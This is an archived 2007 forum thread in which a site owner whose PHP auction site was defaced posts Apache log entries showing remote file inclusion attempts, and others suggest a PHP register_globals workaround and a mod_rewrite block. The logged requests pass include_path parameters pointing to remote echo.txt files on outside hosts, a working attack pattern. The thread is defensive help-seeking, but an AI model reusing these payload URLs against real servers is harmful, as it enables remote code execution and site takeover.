|
|
Posted by Charles Crume on 10/17/07 23:22
Hi Jean;
This has to be added to every script, correct? (If so, it would be too much
work and I would be better off to purchase newer auction software.)
I am also looking at use mod_rewrite in Apache to redirect any request with
"include_path" in it to a null page. Does anyone have thoughts on this
approach?
TIA.
Charles...
"Jean Gaudreau" <jean.gaudreau@gmail.com> wrote in message
news:1192541328.007138.293000@i13g2000prf.googlegroups.com...
> On Oct 14, 9:56 pm, "Charles Crume"
> <NOccsS...@charlescrumesoftware.com> wrote:
>> Hello Everyone;
>>
>> My site was hacked the other day -- someone was able to rename my
>> index.shtml file and put their own index.html file on my server. Not sure
>> how it was done, but looking through the log file, I found a lots and
>> lots
>> of entries where an "include_path" parameter was included in the URL of
>> the
>> PHP page, as shown below:
>>
>> 69.94.36.155 - - [11/Oct/2007:15:07:23 -0400] "GET
>> /auction/item.php?id=268/includes/auctionstoshow.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
>> HTTP/1.1" 200 56446 "-" "libwww-perl/5.65"
>>
>> 69.94.36.155 - - [11/Oct/2007:15:07:38 -0400] "GET
>> /auction/includes/settings.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
>> HTTP/1.1" 200 75 "-" "libwww-perl/5.65"
>>
>> 69.94.36.155 - - [11/Oct/2007:15:07:39 -0400] "GET
>> /auction/includes/settings.inc.php?include_path=http://www.usiauctions.biz/logo/pekok/doc/echo.txt?
>> HTTP/1.0" 200 75 "-" "Mozilla/5.0"
>>
>> 213.194.149.61 - - [11/Oct/2007:15:45:39 -0400] "GET
>> /auction/index.php?include_path=http://www.baybids.com/uploaded/echo.txt?
>> HTTP/1.1" 200 78669 "-" "libwww-perl/5.808"
>>
>> 213.194.149.61 - - [11/Oct/2007:15:45:42 -0400] "GET
>> /index.php?include_path=http://www.baybids.com/uploaded/echo.txt?HTTP/1.1"
>> 404 310 "-" "libwww-perl/5.808"
>>
>> 213.194.149.61 - - [11/Oct/2007:15:46:49 -0400] "GET
>> /auction/index.php?include_path=http://www.baybids.com/uploaded/echo.txt?
>> HTTP/1.1" 200 78439 "-" "libwww-perl/5.808"
>>
>> 213.194.149.61 - - [11/Oct/2007:15:46:52 -0400] "GET
>> /index.php?include_path=http://www.baybids.com/uploaded/echo.txt?HTTP/1.1"
>> 404 310 "-" "libwww-perl/5.808"
>>
>> 213.194.149.61 - - [11/Oct/2007:15:48:11 -0400] "GET
>> /auction/item.php?id=268/includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
>> HTTP/1.1" 200 56360 "-" "libwww-perl/5.808"
>>
>> 213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
>> /includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
>> HTTP/1.1" 404 325 "-" "libwww-perl/5.808"
>>
>> 213.194.149.61 - - [11/Oct/2007:15:48:13 -0400] "GET
>> /auction/includes/setting.inc.php?include_path=http://www.baybids.com/uploaded/echo.txt?
>> HTTP/1.1" 404 333 "-" "libwww-perl/5.808"
>>
>> I know how "include_path" works when *in* the PHP file, but I'm not sure
>> what the effect of including it in the URL. A number of entries show a
>> code
>> 404 as the culprits are obviously phising for pages, but requests with
>> return code 200 are showing a large number of bytes transferred -- far
>> larger than the PHP page itself.
>>
>> Can someone explain what adding "include_path" to a URL does?
>>
>> Is there something I need to check on my server of how I've got Apache
>> configured?
>>
>> TIA.
>>
>> Charles...
>
> Hi,
>
> I've been the target also of a hacker, with the same attack.
>
> Add this to you script:
>
> =====
>
> $php_self = $_SERVER['PHP_SELF'];
>
> if (($php_self == "/auction/includes/settings.inc.php") &&
> (ini_get(register_globals))) {
> $rg = array_keys($_REQUEST);
> foreach($rg as $var)
> {
> if ($_REQUEST[$var] === $$var)
> {
> unset($$var);
> exit;
> }
> }
> }
>
> =======
>
> This will check if they are running the file, if register_globals is
> enabled catch the parameters and unset them then halt the script.
>
> So far it is working.
>
> Jean
>
Navigation:
[Reply to this message]
|